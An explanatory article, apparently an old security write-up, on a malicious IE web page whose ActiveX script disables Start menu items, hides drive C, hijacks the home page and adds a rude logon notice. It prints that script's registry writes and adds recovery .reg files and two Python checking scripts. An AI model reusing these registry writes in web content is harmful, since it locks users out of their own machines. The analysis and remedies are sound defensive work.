Can browsing a web page modify the registry? Certainly! If you have visited the page http://www.XX.com/default.htm, you may already be feeling the worse for it.
When you open this page:
1. The Start menu is modified:
   1) "Shut Down" is disabled
   2) "Run" is disabled
   3) "Log Off" is disabled
2. Drive C is hidden: your C drive can no longer be found
3. The Registry Editor (regedit) is disabled
4. DOS programs are disabled
5. The system can no longer enter "real mode" (MS-DOS mode)
6. No program can be run
7. The IE home page is changed to http://www.XX.com/, which is also added to the Favorites folder.
How are these effects achieved? The page was created using Java technology and is an ActiveX web page file containing harmful code. To let more people know about its dangers, I examined its source code; it is reproduced below with my notes added.
Note: The following line changes the default home page of IE to http://www.XX.com/
SHL.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.XX.com/");
Note: The following are the calls the page uses to modify the victim's registry keys.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
Note: This removes the "Run" item from the victim's Start menu, so the user cannot open the Registry Editor to undo the changes the page makes to the system registry.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
Note: This removes the "Shut Down" item, so the victim cannot shut the system down.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogoff", 01, "REG_BINARY");
Note: This removes the "Log Off" item from the victim's Start menu.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
Note: This hides logical drive C on the victim's system.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "REG_BINARY");
Note: This disables all DOS applications (as published, the listing omits the value argument for this call and the next).
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "REG_BINARY");
Note: The system can no longer be started in "real mode" (traditional DOS mode).
Note: When the page is loaded, it also modifies the following keys so that a notice window is displayed during Windows logon (before the Microsoft network user logon).
SHL.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "...");
Note: This sets the title of that window to "Oh la..."
SHL.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "Welcome! You are an incredible idiot! The story \"Oh la...\" begins, and you enter the miserable world as decreed");
Note: The line above sets the text shown in the window.
Note: The following two lines modify the registry so that the title of every IE window on the victim's machine is followed by "Oh la..."
SHL.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "...");
SHL.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "...");
Note: With the line above, all modifications to the victim's registry are complete!
Note: The following code adds a web page to the victim's Favorites.
var WF, Shor, Loc;
WF = FSO.GetSpecialFolder(0);
Loc = WF + "\\Favorites";
if (!FSO.FolderExists(Loc))
{
    Loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
    if (!FSO.FolderExists(Loc))
    {
        return;
    }
}
Note: The following line performs the actual addition to Favorites.
AddFavLnk(Loc, "Find the feeling www.XX.com", "http://www.XX.com");
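As an added defensive example that is not part of the original page: a small scanner that finds RegWrite calls in a page's script and flags those aimed at the policy, logon-notice and IE keys the listing above writes. The sensitive-path list, the normalise step and the constructed sample are my own; only the key names come from the listing.

```python
import re

# Registry locations the page's script writes; no legitimate web page should touch
# them from a browser. (Constructed from the RegWrite calls in the listing above.)
SENSITIVE = (
    r"\policies\explorer", r"\policies\winoldapp", r"\policies\system",
    r"\winlogon\legalnotice", r"\internet explorer\main\start page",
    r"\internet explorer\main\window title",
)
# <obj>.RegWrite("<key>", ...) with either quote style, case-insensitive, key may wrap lines.
REGWRITE = re.compile(r'\.\s*regwrite\s*\(\s*(["\'])(.*?)\1', re.IGNORECASE | re.DOTALL)

def normalise(key):
    """Undo JScript escaping and line wrapping so the key can be compared as a path."""
    key = key.replace("\\\\", "\\")      # "\\" in the source is one backslash in the key
    key = re.sub(r"\s*\n\s*", "", key)   # keys that the page wrapped across lines
    return key.lower()

def regwrite_hits(source):
    """Return the (normalised) registry keys the script writes under a sensitive path."""
    hits = []
    for _quote, key in REGWRITE.findall(source):
        path = normalise(key)
        if any(s in path for s in SENSITIVE):
            hits.append(path)
    return hits

# Constructed sample in the style of the page's script (not the original file); the last
# call writes an ordinary application key and must not be flagged.
SAMPLE = r'''
SHL.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.XX.com/");
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
SHL.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "...");
SHL.RegWrite("HKCU\\Software\\SomeApp\\LastRun", "1");
'''
```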
Because the code is simple and annotated, I believe you now understand what is going on. What should you do if you accidentally visited the page and have already been hit? Don't worry; the solution is listed below.
Solutions for affected users:
1. Win9x users: press F8 when the computer starts, choose MS-DOS mode, and run the command scanreg /restore to restore an earlier, normal registry backup.
2. Win2000 users: copy the following content and save it as a file named unlock.reg, boot into Safe Mode with Command Prompt, import it with the command regedit unlock.reg, then restart the machine.
The content of the unlock.reg file is as follows:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogoff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000000
"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE browser"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE browser"
Preventive measures:
1. To avoid being hit, do not casually visit websites you do not know.
2. Disable ActiveX plug-ins and controls and Java scripts in the IE settings.
3. Upgrade to the latest virus database to guard against such malicious web pages.
4. Since the page damages our system by modifying the registry, we can lock the registry in advance to prevent modification. But what if we then need to use the Registry Editor regedit.exe ourselves? So we need to prepare a "key" in advance to open this "lock"!
The locking method is as follows:
(1) Run the Registry Editor regedit.exe;
(2) Expand the registry to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Users.
The unlock method is as follows:
Use Notepad to write a .reg file with any name, for example unlock.reg, with the following content:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
Save it to disk: you now have the key to the lock! To use the Registry Editor again, double-click unlock.reg. Note that there must be a blank line after "REGEDIT4", and there must be no space between the "T" and the "4" in "REGEDIT4"; otherwise your earlier work will be wasted!
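To verify a restore file before importing it, here is a small checker, added as an example and not part of the article: it parses a .reg file the way the notes above require (REGEDIT4 or the 5.00 header, then a blank line, then [key] sections with dword:/hex:/string values) and lists which of the restrictions set by the page's RegWrite calls the file leaves in force. The value names and the condensed unlock.reg sample are taken from this article; run on that sample, it reports that NoClose is never reset.

```python
import re
# Restrictions the page's script writes (constructed from the RegWrite calls above).
POL = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies"
RESTRICTIONS = [(POL + r"\Explorer", n) for n in ("NoRun", "NoClose", "NoLogoff", "NoDrives")]
RESTRICTIONS += [(POL + r"\WinOldApp", "Disabled"), (POL + r"\WinOldApp", "NoRealMode")]
HEADERS = ("REGEDIT4", "Windows Registry Editor Version 5.00")

def decode(raw):  # dword:/hex: -> int (an empty "hex:" clears the value to 0), "..." -> str
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    if raw.lower().startswith("hex:"):
        data = bytes.fromhex(raw[4:].replace(",", ""))
        return int.from_bytes(data, "little") if data else 0
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return raw[1:-1]
    raise ValueError("unsupported value literal: " + raw)

def parse_reg(text):
    """Parse .reg text into {key: {name: value}} (keys and names lower-cased)."""
    lines = text.splitlines()
    if len(lines) < 2 or lines[0].strip() not in HEADERS or lines[1].strip():
        raise ValueError("need REGEDIT4 or the 5.00 header followed by a blank line")
    entries, cur = {}, None
    for line in (l.strip() for l in lines[2:]):
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            cur = entries.setdefault(line[1:-1].lower(), {})
        elif cur is not None and (m := re.match(r'^"([^"]+)"=(.*)$', line)):
            cur[m.group(1).lower()] = decode(m.group(2))
        else:
            raise ValueError("malformed line: " + line)
    return entries

def uncleared(text):  # restrictions the restore file leaves missing or non-zero
    entries = parse_reg(text)
    return [(k, n) for k, n in RESTRICTIONS if entries.get(k.lower(), {}).get(n.lower()) != 0]

# Constructed sample: the article's unlock.reg, condensed to its policy sections.
UNLOCK_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=hex:
"NoLogoff"=hex:
"NoDrives"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000000
"NoRealMode"=dword:00000000
"""
```

The walrus operator requires Python 3.8 or later.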
NOTE: The damage caused by the malicious code on the "Wan Hua Gu" web page can also be prevented with the methods described above, and the same methods can be used to recover after being hit. In addition, KV3000 can completely repair the system damage caused by the "Wan Hua Gu" page and by the web page described in this article.